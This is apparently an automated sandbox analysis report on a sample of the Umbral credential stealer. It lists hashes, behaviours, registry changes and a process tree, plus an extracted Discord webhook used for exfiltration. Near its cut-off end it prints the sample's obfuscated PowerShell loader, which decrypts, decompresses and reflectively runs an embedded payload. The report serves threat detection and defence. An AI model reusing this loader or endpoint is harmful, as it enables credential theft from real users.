umbral | b99eb432b5d440a41faf8ed09c3df4ff0cf82ca13fefed8c2cb56ca96960ab4d

Analysis

max time kernel
144s
max time network
110s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
12/10/2024, 09:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Umbral.bat
Size

468KB
MD5

50c1619dde4c59211f2220d19fd7a2ff
SHA1

f89a90307b00ff0bd2733642ea43427bc304c730
SHA256

b99eb432b5d440a41faf8ed09c3df4ff0cf82ca13fefed8c2cb56ca96960ab4d
SHA512

ed591a3357cc3e3487b708f2e08a74683c93d5e5e16d1978f90f4dc37b77f147bb36ba3cb55318d146c0831f7636baa22006b6c9960db3e8a72dbdc798efb627
SSDEEP

12288:7WdGCJGwwo92cPLI0O8JtFDUB9PvBxdCAI2hlojjF9xq:SNswwxcjJngP3PdCVuM9xq

Score

10^/10

umbral execution stealer

Malware Config

Extracted

Family

umbral

https://discord.com/api/webhooks/1289565581565104128/6_mwv0w1S5A0l9XLPkwW6UmUZxdAw3mP7dh5lsWmFsgqgu5kJGEszt1-zAw_BajgNh6i

Signatures

Detect Umbral payload 1 IoCs

resource	yara_rule
behavioral2/memory/2960-112-0x000002CB6FF20000-0x000002CB6FF60000-memory.dmp	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral

Blocklisted process makes network request 2 IoCs

flow	pid	Process
13	2960	powershell.exe
15	2960	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2960	powershell.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
14	ip-api.com

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe

Modifies data under HKEY_USERS 41 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	svchost.exe

Modifies registry class 22 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1\LU	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1\LU\ICT = "133727688378749299"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133731976610668822"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133731975690353301"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133731976004262606"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy	svchost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133731975998481252"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1\LU\PCT = "133727688376561726"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133731976625668849"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133731975747543810"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133731975993637730"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133731975748793946"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133731975750981344"	svchost.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

pid	Process
2960	powershell.exe
2960	powershell.exe
2960	powershell.exe
2960	powershell.exe
2960	powershell.exe
2960	powershell.exe
2960	powershell.exe
2960	powershell.exe
2960	powershell.exe
2960	powershell.exe
2960	powershell.exe
2960	powershell.exe
2960	powershell.exe
2960	powershell.exe
2960	powershell.exe
2960	powershell.exe
2960	powershell.exe
2960	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2960	powershell.exe
Token: SeAssignPrimaryTokenPrivilege	2304	svchost.exe
Token: SeIncreaseQuotaPrivilege	2304	svchost.exe
Token: SeSecurityPrivilege	2304	svchost.exe
Token: SeTakeOwnershipPrivilege	2304	svchost.exe
Token: SeLoadDriverPrivilege	2304	svchost.exe
Token: SeSystemtimePrivilege	2304	svchost.exe
Token: SeBackupPrivilege	2304	svchost.exe
Token: SeRestorePrivilege	2304	svchost.exe
Token: SeShutdownPrivilege	2304	svchost.exe
Token: SeSystemEnvironmentPrivilege	2304	svchost.exe
Token: SeUndockPrivilege	2304	svchost.exe
Token: SeManageVolumePrivilege	2304	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2304	svchost.exe
Token: SeIncreaseQuotaPrivilege	2304	svchost.exe
Token: SeSecurityPrivilege	2304	svchost.exe
Token: SeTakeOwnershipPrivilege	2304	svchost.exe
Token: SeLoadDriverPrivilege	2304	svchost.exe
Token: SeSystemtimePrivilege	2304	svchost.exe
Token: SeBackupPrivilege	2304	svchost.exe
Token: SeRestorePrivilege	2304	svchost.exe
Token: SeShutdownPrivilege	2304	svchost.exe
Token: SeSystemEnvironmentPrivilege	2304	svchost.exe
Token: SeUndockPrivilege	2304	svchost.exe
Token: SeManageVolumePrivilege	2304	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2304	svchost.exe
Token: SeIncreaseQuotaPrivilege	2304	svchost.exe
Token: SeSecurityPrivilege	2304	svchost.exe
Token: SeTakeOwnershipPrivilege	2304	svchost.exe
Token: SeLoadDriverPrivilege	2304	svchost.exe
Token: SeSystemtimePrivilege	2304	svchost.exe
Token: SeBackupPrivilege	2304	svchost.exe
Token: SeRestorePrivilege	2304	svchost.exe
Token: SeShutdownPrivilege	2304	svchost.exe
Token: SeSystemEnvironmentPrivilege	2304	svchost.exe
Token: SeUndockPrivilege	2304	svchost.exe
Token: SeManageVolumePrivilege	2304	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2304	svchost.exe
Token: SeIncreaseQuotaPrivilege	2304	svchost.exe
Token: SeSecurityPrivilege	2304	svchost.exe
Token: SeTakeOwnershipPrivilege	2304	svchost.exe
Token: SeLoadDriverPrivilege	2304	svchost.exe
Token: SeSystemtimePrivilege	2304	svchost.exe
Token: SeBackupPrivilege	2304	svchost.exe
Token: SeRestorePrivilege	2304	svchost.exe
Token: SeShutdownPrivilege	2304	svchost.exe
Token: SeSystemEnvironmentPrivilege	2304	svchost.exe
Token: SeUndockPrivilege	2304	svchost.exe
Token: SeManageVolumePrivilege	2304	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2304	svchost.exe
Token: SeIncreaseQuotaPrivilege	2304	svchost.exe
Token: SeSecurityPrivilege	2304	svchost.exe
Token: SeTakeOwnershipPrivilege	2304	svchost.exe
Token: SeLoadDriverPrivilege	2304	svchost.exe
Token: SeSystemtimePrivilege	2304	svchost.exe
Token: SeBackupPrivilege	2304	svchost.exe
Token: SeRestorePrivilege	2304	svchost.exe
Token: SeShutdownPrivilege	2304	svchost.exe
Token: SeSystemEnvironmentPrivilege	2304	svchost.exe
Token: SeUndockPrivilege	2304	svchost.exe
Token: SeManageVolumePrivilege	2304	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2304	svchost.exe
Token: SeIncreaseQuotaPrivilege	2304	svchost.exe
Token: SeSecurityPrivilege	2304	svchost.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
3520	Explorer.EXE
3520	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3672 wrote to memory of 384	3672	cmd.exe	87
PID 3672 wrote to memory of 384	3672	cmd.exe	87
PID 3672 wrote to memory of 2960	3672	cmd.exe	88
PID 3672 wrote to memory of 2960	3672	cmd.exe	88
PID 2960 wrote to memory of 3520	2960	powershell.exe	56
PID 2960 wrote to memory of 2556	2960	powershell.exe	45
PID 2960 wrote to memory of 3540	2960	powershell.exe	75
PID 2960 wrote to memory of 1764	2960	powershell.exe	31
PID 2960 wrote to memory of 4952	2960	powershell.exe	65
PID 2960 wrote to memory of 1556	2960	powershell.exe	68
PID 2960 wrote to memory of 1160	2960	powershell.exe	19
PID 2960 wrote to memory of 1748	2960	powershell.exe	30
PID 2960 wrote to memory of 952	2960	powershell.exe	12
PID 2960 wrote to memory of 948	2960	powershell.exe	15
PID 2960 wrote to memory of 4884	2960	powershell.exe	69
PID 2960 wrote to memory of 1532	2960	powershell.exe	27
PID 2960 wrote to memory of 2908	2960	powershell.exe	52
PID 2960 wrote to memory of 2708	2960	powershell.exe	71
PID 2960 wrote to memory of 1524	2960	powershell.exe	26
PID 2960 wrote to memory of 1716	2960	powershell.exe	29
PID 2960 wrote to memory of 2304	2960	powershell.exe	41
PID 2960 wrote to memory of 1120	2960	powershell.exe	17
PID 2960 wrote to memory of 1308	2960	powershell.exe	23
PID 2960 wrote to memory of 720	2960	powershell.exe	14
PID 2960 wrote to memory of 1500	2960	powershell.exe	25
PID 2960 wrote to memory of 2680	2960	powershell.exe	46
PID 2960 wrote to memory of 1300	2960	powershell.exe	22
PID 2960 wrote to memory of 904	2960	powershell.exe	11
PID 2960 wrote to memory of 3660	2960	powershell.exe	57
PID 2960 wrote to memory of 1892	2960	powershell.exe	34
PID 2960 wrote to memory of 1292	2960	powershell.exe	21
PID 2960 wrote to memory of 1880	2960	powershell.exe	33
PID 2960 wrote to memory of 2076	2960	powershell.exe	39
PID 2960 wrote to memory of 1988	2960	powershell.exe	36
PID 2960 wrote to memory of 2064	2960	powershell.exe	38
PID 2960 wrote to memory of 3432	2960	powershell.exe	55
PID 2960 wrote to memory of 1652	2960	powershell.exe	28
PID 2960 wrote to memory of 2232	2960	powershell.exe	40
PID 2960 wrote to memory of 1144	2960	powershell.exe	18
PID 2960 wrote to memory of 2816	2960	powershell.exe	51
PID 2960 wrote to memory of 1976	2960	powershell.exe	35
PID 2960 wrote to memory of 1828	2960	powershell.exe	32
PID 2960 wrote to memory of 1032	2960	powershell.exe	66
PID 2960 wrote to memory of 2804	2960	powershell.exe	50
PID 2960 wrote to memory of 1420	2960	powershell.exe	24
PID 2960 wrote to memory of 2400	2960	powershell.exe	43
PID 2960 wrote to memory of 2392	2960	powershell.exe	42
PID 2960 wrote to memory of 1012	2960	powershell.exe	16
PID 2960 wrote to memory of 796	2960	powershell.exe	10
PID 2960 wrote to memory of 2764	2960	powershell.exe	48
PID 2960 wrote to memory of 1184	2960	powershell.exe	20
PID 796 wrote to memory of 932	796	svchost.exe	89
PID 796 wrote to memory of 932	796	svchost.exe	89
PID 2960 wrote to memory of 5064	2960	powershell.exe	90
PID 2960 wrote to memory of 5064	2960	powershell.exe	90
PID 796 wrote to memory of 3172	796	svchost.exe	92
PID 796 wrote to memory of 3172	796	svchost.exe	92
PID 796 wrote to memory of 3172	796	svchost.exe	92
PID 796 wrote to memory of 8	796	svchost.exe	94
PID 796 wrote to memory of 8	796	svchost.exe	94
PID 796 wrote to memory of 8	796	svchost.exe	94
PID 796 wrote to memory of 2456	796	svchost.exe	95
PID 796 wrote to memory of 2456	796	svchost.exe	95
PID 796 wrote to memory of 2456	796	svchost.exe	95

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:796
- C:\Windows\system32\wbem\wmiprvse.exe
  C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
  2⤵
  PID:932
- C:\Windows\system32\backgroundTaskHost.exe
  "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
  2⤵
  PID:3172
- C:\Windows\system32\backgroundTaskHost.exe
  "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
  2⤵
  PID:8
- C:\Windows\system32\BackgroundTransferHost.exe
  "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
  2⤵
  PID:2456
- C:\Windows\system32\backgroundTaskHost.exe
  "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
  2⤵
  PID:1972
- C:\Windows\System32\RuntimeBroker.exe
  C:\Windows\System32\RuntimeBroker.exe -Embedding
  2⤵
  PID:5036
- C:\Windows\system32\DllHost.exe
  C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
  2⤵
  PID:1252

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS -p
1⤵
PID:904

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:952

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:720

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:948

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
1⤵
PID:1012

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1120

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1144

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1160

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1184

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1292

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1300

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1308

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1420

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1500

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1524

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1532

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1652

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1716

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1748

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1764

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1828

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1880

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1892

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1976

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1988

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
1⤵
PID:2064

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2076

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2232

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2304

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2392

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2400

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2556

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2680

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2764

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2804

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2816

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2908

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3432

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:3520
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Umbral.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3672
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JBDmY5Rm32yFC2eFK/K6i05UDHc2UnMQkJErjy0URRw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hIqIhLZZ4mABnJftMk1zig=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $LaItK=New-Object System.IO.MemoryStream(,$param_var); $BkPnB=New-Object System.IO.MemoryStream; $dqAwB=New-Object System.IO.Compression.GZipStream($LaItK, [IO.Compression.CompressionMode]::Decompress); $dqAwB.CopyTo($BkPnB); $dqAwB.Dispose(); $LaItK.Dispose(); $BkPnB.Dispose(); $BkPnB.ToArray();}function execute_function($param_var,$param2_var){ $aRoAH=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $GgeTI=$aRoAH.EntryPoint; $GgeTI.Invoke($null, $param2_var);}$cxvio = 'C:\Users\Admin\AppData\Local\Temp\Umbral.bat';$host.UI.RawUI.WindowTitle = $cxvio;$jncrM=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($cxvio).Split([Environment]::NewLine);foreach ($EHnfk in $jncrM) { if ($EHnfk.StartsWith('qqYQzFlhLQoZwGnqjKHD')) { $uHvVU=$EHnfk.Substring(20); break; }}$payloads_var=[string[]]$uHvVU.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', 